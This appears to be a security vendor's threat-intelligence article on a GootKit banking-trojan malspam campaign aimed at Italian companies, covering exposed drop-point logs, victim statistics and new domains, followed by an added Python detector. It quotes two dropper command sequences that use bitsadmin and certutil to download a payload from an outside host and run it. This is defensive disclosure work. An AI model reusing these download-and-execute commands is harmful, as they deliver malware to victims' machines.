The TaxOlolo Affair – A Prequel and a Sequel

Why this article?

Some news items have recently been published about a “new” malspam campaign targeting Italian users, such as these two:

In this campaign, the attackers are sending out forged spam messages impersonating the Italian Department of Treasury (Ministero dell’Economia e delle Finanze). The messages contain a link leading to the download and execution of a banking trojan, apparently a new variant of the already known GootKit, in the form of different executable files.

These malicious executable files are downloaded from various drop points hosted on different domains. Analyzing these domains, it turned out that directory listing was enabled on the webserver, due to a misconfiguration left by the attackers, making it possible to access the campaign logs.

There are already a number of articles explaining the methodology of the attack from a technical point of view, so we are not focusing on that. In this article, we will present our findings about the presence of a very similar campaign, back in August of last year. Furthermore, we will take a look at some juicy information regarding the victims.

Our Findings

We started by analyzing the public IoCs of the current campaign. In particular, we focused on the domains of the drop points: all of them resolve to the same IP address, 185.61.152.71.

Analyzing the drop point IP, it was possible to detect a misconfiguration that allowed listing the webserver content (no longer accessible, due to the deactivation of the registrant account). Among the listed files, we identified all the delivered malware samples, some control functions, and the log files of the campaign. In particular, there were 5 different log files, as shown below:

The most interesting ones are “log_file.txt”, “log_file_doc.txt” and “logThemes141.txt”, because they contain the status of every malware delivery (delivery OK or failed) to the victims, each one referring to a specific executable file (54, 54_zip and 1t.exe). They also contain some information about the victims, such as IP address, country, the user agent used to access the executable file, the timestamp of the request and whois information.

In the image below an extract of the file “log_file.txt” is shown (all the victims’ IP addresses have been obscured for privacy reasons):

We carried out some numerical and distributional analysis on these three log files, covering the geolocation of the victims and the number of different files they downloaded. All the results are presented below.

From left to right: the distribution of the different second stages downloaded, the total count of download requests, and their outcome

Country distribution of the download requests by victims – based on IP geolocation

Left: Country distribution of the successful downloads (based on IP geolocation) – Lower Right: downloads outcome distribution in Italy

As we can see from the count of successful downloads (upper-right), the campaign clearly focuses on Italian targets.

TOP100 of the targeted companies – based on whois information

Where the whois match is a targeted ISP, it is highly probable that its customers are included among the victims.

Then, we proceeded to analyze the “requestsTheme141Exe.txt” log file, which contains every single GET request made by the victims to the drop point. The queried domain of the drop point is also present for each request: here we discovered 14 further domains, not mentioned in any IoC list at the time of writing (listed at the end of this publication, in the IoCs Lists section).


From a deeper analysis of the newly identified drop point domains, we identified a Windows batch file named “documento dicembre 2017.bat”, very similar to the current dropper and dating back to last December. It is shown in the following figure:

Thanks to this finding, we can assert that the attackers’ infrastructure was already built at that time, and they just updated the documents used in the newest campaign.

Continuing the research on the newly found domains, we identified 1 further spam email message used in the campaign. Here we found the following new sender address: info@lc-hc.org. The identified message is shown in the following figure:


In August 2017 we found some traces of another similar malspam campaign, which we analyzed at that time. In particular, the TTP similarities consist of:

  • the delivered malware family: GootKit banking trojan
  • the infection vector: a malspam email message
  • the dropper: a file containing some command line instructions
  • the targets: Italian companies

Here is the comparison between the two droppers:

Old (August, 2017): a .lnk file used to launch the bitsadmin Windows utility to download the second stage

cmd.exe /k bitsadmin /transfer cola /priority high http://icaan.evaklaw.com/load11.bin %AppData%\host11.exe
%AppData%\host11.exe
exit

Current (January, 2018): a .bat file used to launch the certutil Windows utility to download the second stage

certutil -urlcache -split -f http://lawrencekamin.com/images2.php %TEMP%\image.tmp > NUL
certutil -decode %TEMP%\image.tmp %TEMP%\ZxCCAdoHost.exe > NUL
start %TEMP%\ZxCCAdoHost.exe

These 2 campaigns are probably linked to each other (is the current one the evolution of the August campaign?) and we are currently working to confirm this.
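As an added example (not part of the original article or the authors' analysis), here is a small Python detector for the two dropper patterns compared above, run over constructed process-creation records; the “timestamp|host|parent_image|command_line” record format is an assumption, and the sample records are built from the commands quoted in the comparison.

```python
import re
from collections import namedtuple

# Added example, not code from the article: flags the LOLBin download-and-execute
# patterns of the two droppers above in process-creation records. The record format
# "timestamp|host|parent_image|command_line" is ASSUMED; sample records are CONSTRUCTED.
Alert = namedtuple("Alert", "timestamp host pattern command_line")

# August 2017 dropper: bitsadmin /transfer pulling an http(s) URL into a user-writable dir.
BITSADMIN_RE = re.compile(
    r"bitsadmin(?:\.exe)?\s+/transfer\b.*?\bhttps?://\S+\s+\S*%(?:AppData|LocalAppData|TEMP)%",
    re.IGNORECASE)
# January 2018 dropper, step 1: certutil -urlcache -split -f <url> <file>.
CERTUTIL_URLCACHE_RE = re.compile(
    r"certutil(?:\.exe)?\s+[-/]urlcache\b.*?[-/]f\s+https?://\S+", re.IGNORECASE)
# January 2018 dropper, step 2: certutil -decode <blob> <something>.exe.
CERTUTIL_DECODE_RE = re.compile(
    r"certutil(?:\.exe)?\s+[-/]decode\s+\S+\s+\S+\.exe\b", re.IGNORECASE)
PATTERNS = [
    ("bitsadmin_download_to_user_dir", BITSADMIN_RE),
    ("certutil_urlcache_download", CERTUTIL_URLCACHE_RE),
    ("certutil_decode_to_exe", CERTUTIL_DECODE_RE),
]

def parse_record(line):
    """Split one record into its four fields; None for blank or malformed lines."""
    parts = line.strip().split("|", 3)
    return dict(zip(("timestamp", "host", "parent", "cmdline"), parts)) if len(parts) == 4 else None

def scan(lines):
    """Return one Alert per matching (record, pattern); benign records yield nothing."""
    alerts = []
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        for name, rx in PATTERNS:
            if rx.search(rec["cmdline"]):
                alerts.append(Alert(rec["timestamp"], rec["host"], name, rec["cmdline"]))
    return alerts

# Constructed records: three taken from the droppers above, two benign certutil/bitsadmin uses.
SAMPLE_LOG = """\
2018-01-15T09:12:03Z|WS-042|explorer.exe|cmd.exe /k bitsadmin /transfer cola /priority high http://icaan.evaklaw.com/load11.bin %AppData%\\host11.exe
2018-01-15T09:14:11Z|WS-042|cmd.exe|certutil -urlcache -split -f http://lawrencekamin.com/images2.php %TEMP%\\image.tmp
2018-01-15T09:14:12Z|WS-042|cmd.exe|certutil -decode %TEMP%\\image.tmp %TEMP%\\ZxCCAdoHost.exe
2018-01-15T09:20:00Z|WS-017|services.exe|certutil -verify C:\\certs\\server.cer
2018-01-15T09:21:45Z|WS-017|explorer.exe|bitsadmin /list /allusers
"""
```

Running scan(SAMPLE_LOG.splitlines()) yields three alerts, all on host WS-042, while the two benign certutil/bitsadmin invocations produce nothing.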


We have already updated our global threat database EyeOnThreat™ with all the IoCs related to this campaign.


Contact Us

If you want more information about this threat, feel free to send us a mail to our mailbox supporto[.]security-intelligence[@]lutech[.]it.

IoCs Lists

The following table shows a list of the IoCs we collected from public sources and produced with our analysis.


Authors

Fabio Bellani, Luca Sangalli
